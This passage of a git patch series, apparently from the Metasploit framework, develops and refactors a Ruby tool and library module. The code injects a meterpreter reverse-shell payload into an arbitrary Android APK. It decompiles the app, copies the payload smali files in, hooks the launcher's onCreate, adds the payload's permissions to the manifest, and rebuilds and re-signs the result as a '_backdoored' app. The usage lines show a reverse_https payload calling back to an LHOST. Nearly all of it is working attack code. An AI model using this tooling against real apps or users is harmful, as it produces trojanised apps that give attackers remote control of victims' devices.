it.\n" - exit(1) +unless apktool != nil + $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) end apk_v = Gem::Version.new(apktool) -unless(apk_v >= Gem::Version.new('2.0.1')) - puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) +unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) end begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } rescue - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - puts "[-] Error parsing msfvenom options. Exiting.\n" - exit(1) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) end #Create temporary directory where work will be done @@ -185,12 +185,12 @@ tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("invalid" || "error") - puts res - exit(1) +if res.downcase.include?("error") + $stderr.puts res + exit(1) end -print "[*] Signing payload..\n" +print "[*] Signing payload..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") run_cmd("cp #{apkfile} #{tempdir}/original.apk") @@ -199,7 +199,7 @@ print "[*] Decompiling orignal APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - + f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close @@ -209,17 +209,17 @@ print "[*] Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin - activitysmali = File.read(smalifile) + activitysmali = File.read(smalifile) rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - puts "[-] Error finding launcher activity. Exiting" - exit(1) - end + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end end print "[*] Copying payload files..\n" @@ -229,7 +229,7 @@ activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" -File.open(smalifile, "w") {|file| file.puts hookedsmali } +File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" @@ -237,7 +237,7 @@ fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk} ..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From ad0ff2ea2f9f158deafa3b03ca656b1d5b9e3cb0 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 05:21:13 +0000 Subject: [PATCH 10/71] move to tools/exploit --- tools/{ => exploit}/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/{ => exploit}/apk_backdoor.rb (100%) diff --git a/tools/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb similarity index 100% rename from tools/apk_backdoor.rb rename to tools/exploit/apk_backdoor.rb From d1ed363a94a0e93252d1e9c634d5355595935f74 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 06:10:15 +0000 Subject: [PATCH 11/71] clean up apk_backdoor.rb --- tools/exploit/apk_backdoor.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index 18401b380d..c0d461d6d6 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb @@ -11,6 +11,10 @@ require 'fileutils' require 'optparse' require 'open3' +def usage + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" +end def run_cmd(cmd) begin @@ -142,8 +146,7 @@ end apkfile = ARGV[0] unless apkfile && File.readable?(apkfile) - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + usage exit(1) end @@ -173,9 +176,8 @@ begin opts+=" " } rescue - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage exit(1) end @@ -183,7 +185,7 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("error") $stderr.puts res @@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] + "_backdoored.apk" +injected_apk = apkfile.sub('.apk', '_backdoored.apk') print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From d2cc32a38942c73f03818f6fcf606c6449615bf7 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 14:37:57 +0000 Subject: [PATCH 12/71] integrate apk_backdoor with msfvenom --- lib/msf/core/payload_generator.rb | 11 +- tools/exploit/apk_backdoor.rb | 197 ++++++++++++++++-------------- 2 files changed, 110 insertions(+), 98 deletions(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b4c436e561..3a209a41dc 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -305,9 +305,14 @@ module Msf # @return [String] A string containing the bytes of the payload in the format selected def generate_payload if platform == "java" or arch == "java" or payload.start_with? "java/" - p = generate_java_payload - cli_print "Payload size: #{p.length} bytes" - p + raw_payload = generate_java_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload + elsif payload.start_with? "android/" + cli_print "Using template: #{template}" + raw_payload = generate_raw_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload else raw_payload = generate_raw_payload raw_payload = add_shellcode(raw_payload) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index c0d461d6d6..fd6e2ca56d 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb @@ -144,105 +144,112 @@ def fix_manifest(tempdir) File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end -apkfile = ARGV[0] -unless apkfile && File.readable?(apkfile) - usage - exit(1) -end - -jarsigner = run_cmd("jarsigner") -unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apktool = run_cmd("apktool -version") -unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apk_v = Gem::Version.new(apktool) -unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) -end - -begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } -rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) -end - -#Create temporary directory where work will be done -tempdir = Dir.mktmpdir - -print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) -res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("error") - $stderr.puts res - exit(1) -end - -print "[*] Signing payload..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") - -run_cmd("cp #{apkfile} #{tempdir}/original.apk") - -print "[*] Decompiling orignal APK..\n" -run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") -print "[*] Decompiling payload APK..\n" -run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - -f = File.open("#{tempdir}/original/AndroidManifest.xml") -amanifest = Nokogiri::XML(f) -f.close - -print "[*] Locating onCreate() hook..\n" - -launcheractivity = find_launcher_activity(amanifest) -smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" -begin - activitysmali = File.read(smalifile) -rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. Exiting" +def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage exit(1) end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end + end + + print "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" end -print "[*] Copying payload files..\n" -FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") -FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" -activitycreate = ';->onCreate(Landroid/os/Bundle;)V' -payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" -hookedsmali = activitysmali.gsub(activitycreate, payloadhook) -print "[*] Loading ",smalifile," and injecting payload..\n" -File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk = apkfile.sub('.apk', '_backdoored.apk') +if __FILE__ == $0 + begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } + rescue + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage + exit(1) + end -print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest(tempdir) + print "[*] Generating msfvenom payload..\n" + msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) + msfvenom_command = "#{msfvenom_path} -f raw #{opts}" + begin + stdin, stdout, stderr = Open3.popen3(msfvenom_command) + payload = stdout.read + msfvenom_output = stderr.read + backdoor_payload(ARGV[0], payload) + rescue Errno::ENOENT + $stderr.puts msfvenom_output + exit(1) + end -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" -run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk}\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - -FileUtils.remove_entry tempdir - -puts "[+] Infected file #{injected_apk} ready.\n" +end From 662a6dfd53f0c3d72dbec3b21cee0e1211ff2d8a Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 14:47:55 +0000 Subject: [PATCH 13/71] =?UTF-8?q?=C2=AF\=5F(=E3=83=84)=5F/=C2=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- lib/msf/core/payload/apk.rb | 225 ++++++++++++++++++++++++++++++ lib/msf/core/payload_generator.rb | 2 + 2 files changed, 227 insertions(+) create mode 100644 lib/msf/core/payload/apk.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb new file mode 100644 index 0000000000..bdfdb4421d --- /dev/null +++ b/lib/msf/core/payload/apk.rb @@ -0,0 +1,225 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'tmpdir' +require 'nokogiri' +require 'fileutils' +require 'optparse' +require 'open3' + +module Msf::Payload::Apk + + def usage + print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + end + + def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end + end + + # Find the activity that is opened when you click the app icon + def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end + end + + # If XML parsing of the manifest fails, recursively search + # the smali code for the onCreate() hook and let the user + # pick the injection point + + def scrape_files_for_launcher_activity(tempdir) + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print_status "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print_status "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print_status "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] + end + + def fix_manifest(tempdir) + payload_permissions=[] + + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } + + original_permissions=[] + apk_mani="" + + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } + + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print_status "[*] Adding #{permission}\n" + add_permissions << permission + end + end + + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } + end + + def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage + exit(1) + end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + print_error "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print_status "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print_status "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print_status "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print_status "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + print_error "[-] Error finding launcher activity. Exiting" + exit(1) + end + end + + print_status "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print_status "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print_status "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" + end +end + + diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 3a209a41dc..b051bbc97e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'msf/core/payload/apk' require 'active_support/core_ext/numeric/bytes' module Msf @@ -310,6 +311,7 @@ module Msf raw_payload elsif payload.start_with? "android/" cli_print "Using template: #{template}" + raw_payload = generate_raw_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload From eeea4bde9d68256b092e643caa3ed83538495ff3 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 15:58:27 +0000 Subject: [PATCH 14/71] integrate ./msfvenom -x for android payloads --- lib/msf/core/payload/apk.rb | 98 ++++-------- lib/msf/core/payload_generator.rb | 6 +- tools/exploit/apk_backdoor.rb | 255 ------------------------------ 3 files changed, 36 insertions(+), 323 deletions(-) delete mode 100755 tools/exploit/apk_backdoor.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bdfdb4421d..107d70d5b7 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -1,6 +1,7 @@ # -*- coding: binary -*- require 'msf/core' +require 'rex/text' require 'tmpdir' require 'nokogiri' require 'fileutils' @@ -9,6 +10,21 @@ require 'open3' module Msf::Payload::Apk + class ApkBackdoor + include Msf::Payload::Apk + def backdoor_apk(apk, payload) + backdoor_payload(apk, payload) + end + end + + def print_status(msg='') + $stderr.puts "[*] #{msg}" + end + + def print_error(msf='') + $stderr.puts "[-] #{msg}" + end + def usage print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" @@ -46,46 +62,6 @@ module Msf::Payload::Apk end end - # If XML parsing of the manifest fails, recursively search - # the smali code for the onCreate() hook and let the user - # pick the injection point - - def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print_status "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print_status "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print_status "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] - end - def fix_manifest(tempdir) payload_permissions=[] @@ -119,7 +95,7 @@ module Msf::Payload::Apk add_permissions=[] for permission in payload_permissions if !(original_permissions.include? permission) - print_status "[*] Adding #{permission}\n" + print_status("Adding #{permission}") add_permissions << permission end end @@ -149,19 +125,19 @@ module Msf::Payload::Apk jarsigner = run_cmd("jarsigner") unless jarsigner != nil - print_error "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + print_error("jarsigner not found. If it's not in your PATH, please add it.") exit(1) end apktool = run_cmd("apktool -version") unless apktool != nil - print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + print_error "apktool not found. If it's not in your PATH, please add it." exit(1) end apk_v = Gem::Version.new(apktool) unless apk_v >= Gem::Version.new('2.0.1') - print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + print_error "apktool version #{apk_v} not supported, please download at least version 2.0.1." exit(1) end @@ -171,54 +147,46 @@ module Msf::Payload::Apk File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } FileUtils.cp apkfile, "#{tempdir}/original.apk" - print_status "[*] Decompiling original APK..\n" + print_status "Decompiling original APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") - print_status "[*] Decompiling payload APK..\n" + print_status "Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close - print_status "[*] Locating onCreate() hook..\n" + print_status "Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin activitysmali = File.read(smalifile) rescue Errno::ENOENT - print_status "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - print_error "[-] Error finding launcher activity. Exiting" - exit(1) - end + print_status "Unable to find correct hook automatically\n" + exit end - print_status "[*] Copying payload files..\n" + print_status "Copying payload files..\n" FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) - print_status "[*] Loading ",smalifile," and injecting payload..\n" + print_status "Loading #{smalifile} and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } - injected_apk = apkfile.sub('.apk', '_backdoored.apk') - - print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + injected_apk = "#{tempdir}/output.apk" + print_status "Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) - print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") - print_status "[*] Signing #{injected_apk}\n" + print_status "Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + outputapk = File.read(injected_apk) + rescue FileUtils.remove_entry tempdir - - puts "[+] Infected file #{injected_apk} ready.\n" end end diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b051bbc97e..11434d52e4 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -310,9 +310,9 @@ module Msf cli_print "Payload size: #{raw_payload.length} bytes" raw_payload elsif payload.start_with? "android/" - cli_print "Using template: #{template}" - - raw_payload = generate_raw_payload + cli_print "Using APK template: #{template}" + apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() + raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) cli_print "Payload size: #{raw_payload.length} bytes" raw_payload else diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb deleted file mode 100755 index fd6e2ca56d..0000000000 --- a/tools/exploit/apk_backdoor.rb +++ /dev/null @@ -1,255 +0,0 @@ -#!/usr/bin/env ruby -# -# This script is a POC for injecting metasploit payloads on -# arbitrary APKs. -# Authored by timwr, Jack64 -# - -require 'tmpdir' -require 'nokogiri' -require 'fileutils' -require 'optparse' -require 'open3' - -def usage - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" -end - -def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end -end - - -# Find the activity that is opened when you click the app icon -def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') 